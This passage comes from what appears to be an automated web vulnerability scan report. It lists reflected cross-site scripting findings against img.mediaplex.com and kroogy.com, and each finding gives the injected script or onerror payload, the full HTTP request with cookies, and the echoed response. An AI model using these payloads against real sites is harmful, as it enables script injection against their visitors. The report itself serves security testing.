This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D61087532ab4b"><script>alert(1)</script>182a4115eca&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:22:26 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:32 GMT
ETag: "6744ca-d9b-49d8a88bd5600"
Accept-Ranges: bytes
Content-Length: 4470
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]" TARGET="_blank">
<IMG SRC=
...[SNIP]...
<script type="text/javascript" src="http://ar.voicefive.com/bmx3/broker.pli?pid=p90175839&PRAd=3992125865291152&AR_C=61087532ab4b"><script>alert(1)</script>182a4115eca">
...[SNIP]...

6.165. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5c37"%3balert(1)//74b8565cf8b was submitted in the mpvc parameter. This input was echoed as b5c37";alert(1)//74b8565cf8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D6108753&mpt=[CACHEBUSTER]&mpvc=b5c37"%3balert(1)//74b8565cf8b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:11 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:32 GMT
ETag: "6744ca-d9b-49d8a88bd5600"
Accept-Ranges: bytes
Content-Length: 4819
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="b5c37";alert(1)//74b8565cf8bhttp://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]"
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=b5c37";alert(1)//74b8565cf8bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D&clickTag=b5c37";alert(1)//74b8565cf8bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHE
...[SNIP]...

6.166. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb90b"><script>alert(1)</script>1c125f11efa was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D6108753&mpt=[CACHEBUSTER]&mpvc=bb90b"><script>alert(1)</script>1c125f11efa HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:09 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:32 GMT
ETag: "6744ca-d9b-49d8a88bd5600"
Accept-Ranges: bytes
Content-Length: 5029
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="bb90b"><script>alert(1)</script>1c125f11efahttp://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]" TARGET="_blank">
...[SNIP]...

6.167. http://kroogy.com/N [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /N

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e592<img%20src%3da%20onerror%3dalert(1)>84ab9e9bf3b was submitted in the REST URL parameter 1. This input was echoed as 8e592<img src=a onerror=alert(1)>84ab9e9bf3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /N8e592<img%20src%3da%20onerror%3dalert(1)>84ab9e9bf3b HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>N8e592<img src=a onerror=alert(1)>84ab9e9bf3bController</strong>
...[SNIP]...

6.168. http://kroogy.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da978<img%20src%3da%20onerror%3dalert(1)>3b67e8c3e65 was submitted in the REST URL parameter 1. This input was echoed as da978<img src=a onerror=alert(1)>3b67e8c3e65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ada978<img%20src%3da%20onerror%3dalert(1)>3b67e8c3e65 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/favicon.icof4c9e%3Cimg%20src%3da%20onerror%3dalert(1)%3E0d6ca5ff0dc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; __utmc=221607367; __utmb=221607367.3.10.1303658380

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:21:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Ada978<img src=a onerror=alert(1)>3b67e8c3e65Controller</strong>
...[SNIP]...

6.169. http://kroogy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc was submitted in the REST URL parameter 1. This input was echoed as f4c9e<img src=a onerror=alert(1)>0d6ca5ff0dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icof4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.icof4c9e<img src=a onerror=alert(1)>0d6ca5ff0dcController</strong>
...[SNIP]...

6.170. http://kroogy.com/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index.php

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 1707b<img%20src%3da%20onerror%3dalert(1)>b2fc2355f06 was submitted in the page parameter. This input was echoed as 1707b<img src=a onerror=alert(1)>b2fc2355f06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E1707b<img%20src%3da%20onerror%3dalert(1)>b2fc2355f06&type=3 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2157

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<iMg src=N onerror=netsparker(9)>1707b<img src=a onerror=alert(1)>b2fc2355f06Controller</strong>
...[SNIP]...

6.171. http://kroogy.com/index/N [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/N

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 426f6<img%20src%3da%20onerror%3dalert(1)>4d3e142698d was submitted in the REST URL parameter 1. This input was echoed as 426f6<img src=a onerror=alert(1)>4d3e142698d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index426f6<img%20src%3da%20onerror%3dalert(1)>4d3e142698d/N HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:20:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index426f6<img src=a onerror=alert(1)>4d3e142698dController</strong>
...[SNIP]...

6.172. http://kroogy.com/index/N [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/N

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82122<img%20src%3da%20onerror%3dalert(1)>cef7219affe was submitted in the REST URL parameter 2. This input was echoed as 82122<img src=a onerror=alert(1)>cef7219affe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/N82122<img%20src%3da%20onerror%3dalert(1)>cef7219affe HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:20:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2115

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>N82122<img src=a onerror=alert(1)>cef7219affe</strong>
...[SNIP]...

6.173. http://kroogy.com/index/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 9a85f<img%20src%3da%20onerror%3dalert(1)>204f92d6c29 was submitted in the page parameter. This input was echoed as 9a85f<img src=a onerror=alert(1)>204f92d6c29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E9a85f<img%20src%3da%20onerror%3dalert(1)>204f92d6c29&type=3 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2157

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<iMg src=N onerror=netsparker(9)>9a85f<img src=a onerror=alert(1)>204f92d6c29Controller</strong>
...[SNIP]...

6.174. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=s&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e was submitted in the REST URL parameter 1. This input was echoed as 5289d<img src=a onerror=alert(1)>704a0bea83e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e/livesearch&q=s&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index5289d<img src=a onerror=alert(1)>704a0bea83eController</strong>
...[SNIP]...

6.175. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=s&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796 was submitted in the REST URL parameter 2. This input was echoed as 84a7e<img src=a onerror=alert(1)>70c18f09796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796&q=s&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch84a7e<img src=a onerror=alert(1)>70c18f09796</strong>
...[SNIP]...

6.176. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=si&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b was submitted in the REST URL parameter 1. This input was echoed as 83857<img src=a onerror=alert(1)>5428059cf9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b/livesearch&q=si&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:27:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
